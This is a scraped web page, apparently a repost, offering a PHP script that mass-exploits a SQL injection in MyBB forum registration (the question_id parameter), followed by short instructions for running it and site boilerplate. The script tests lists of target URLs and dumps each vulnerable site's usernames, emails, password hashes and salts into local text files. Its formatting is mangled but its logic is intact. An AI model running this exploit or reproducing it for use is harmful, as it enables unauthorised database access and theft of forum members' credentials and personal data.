MYBB SQL Injection Vulnerability

Source: Internet
Author: User
Tags explode

<?php error_reporting (0);? ><form method= "POST" action= "" >input a Url (for example:http://myskins.org/18/) : <br><textarea name= "Siteler" cols= "rows=" 7 "></textarea><br><br><input type=" Submit "value=" Get it! "></form><?php Ob_start (); set_time_limit (0); if (!file_exists (" Dumpsss ")) mkdir (" Dumpsss ");        $_post[' Siteler ']== "") {$siteler = explode ("\ n", $_post[' Siteler '), foreach ($siteler as $sites) {$sites =trim ($sites);            if (checkvulnerable ($sites)) {echo "[+] $sites is vulnerable!\n";        Inject ($sites);        } else {echo "[-] Target is not vulnerable\n";   }}}} else {}function Inject ($site) {$get _website = Parse_url ($site);    $website = $get _website["host"]; $html = HttpPost ("$site/member.php", "Regcheck1=&regcheck2=true&username=makman&password=mukarram &password2=mukarram&[email protected]&[email protected]&referrername=& Imagestring=f7yr4&imagehash=1c1d0e6eae9c113f4ff65339e4b3079c&answer=4&allownotices=1&receivepms=1&pmnotice= 1&subscriptionmethod=0&timezoneoffset=0&dstcorrection=2&regtime=1416039333&step= Registration&action=do_register&regsubmit=submit+registration!&question_id= ' or polygon (select*from    (Select*from (select COUNT (*) from mybb_users LIMIT 0,1) f) x))---");    Preg_match ('!select \ ' (. *) \ ' as!s ', $html, $matches);    $count = $matches [1];    echo "[+] Count: $count \ n";        for ($i = 0; $i <= $count; $i + +) {if ($count = = 1) {$num = "0,1";        } else {$num = "$i, 1"; } $html = HttpPost ("$site/member.php", "regcheck1=&regcheck2=true&username=makman&password=mukarram&am p;password2=mukarram&[email protected]&[email protected]&referrername=&imagestring= f7yr4&imagehash=1c1d0e6eae9c113f4ff65339e4b3079c&answer=4&allownotices=1&receivepms=1& Pmnotice=1&subscriPtionmethod=0&timezoneoffset=0&dstcorrection=2&regtime=1416039333&step=registration&action =do_register&regsubmit=submit+registration!&question_id= ' or Polygon ((Select*from (Select*from (select        Concat (Username,0x3a,email,0x3a,password,0x3a,salt) from mybb_users LIMIT $num) f) x))---");        Preg_match ('!select \ ' (. *) \ ' as!s ', $html, $matches);            if (Isset ($matches [1])) {$split = Explode (":", $matches [1]);            $username = $split [0];            $email = $split [1];            $password = $split [2];            $salt = $split [3];            echo "Username: $username \nemail: $email \npassword: $password \nsalt: $salt \ n------\ n"; File_put_contents ("dumpsss/$website. txt", "Username: $username \nemail: $email \npassword: $password \nsalt: $salt \        n------\ nthe ", file_append);    }}}function checkvulnerable ($site) {$ch = Curl_init (); $html = HttpPost ("$site/member.php", "Regcheck1=&regcheck2=true&username=makman&password=mukarram&password2=mukarram&[email protected]&[email protected]&referrername=& imagestring=f7yr4&imagehash=1c1d0e6eae9c113f4ff65339e4b3079c&answer=4&allownotices=1& Receivepms=1&pmnotice=1&subscriptionmethod=0&timezoneoffset=0&dstcorrection=2&regtime= 1416039333&step=registration&action=do_register&regsubmit=submit+registration!&question_id= ' ")    ;    if (Strpos ($html, "You have the error in your SQL syntax")!==false) {return true;    } else {return false;    }}function HttpPost ($site, $post) {$ch = Curl_init ();    curl_setopt ($ch, Curlopt_url, "$site/member.php");    curl_setopt ($ch, Curlopt_returntransfer, true);    curl_setopt ($ch, Curlopt_postfields, $post);    $html = curl_exec ($ch);    Curl_close ($ch); return $html;}? >

Save as xxx.php file, and then execute on the Web page, the Dumpsss folder will be generated in the current directory, if there is a vulnerability, the website members will be exported to the inside TXT file.

If there is no vulnerability, you will be prompted: [-] Target is not vulnerable

Code online View \:HTTPS://GHOSTBIN.COM/PASTE/ZS2MP

MYBB SQL Injection Vulnerability

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.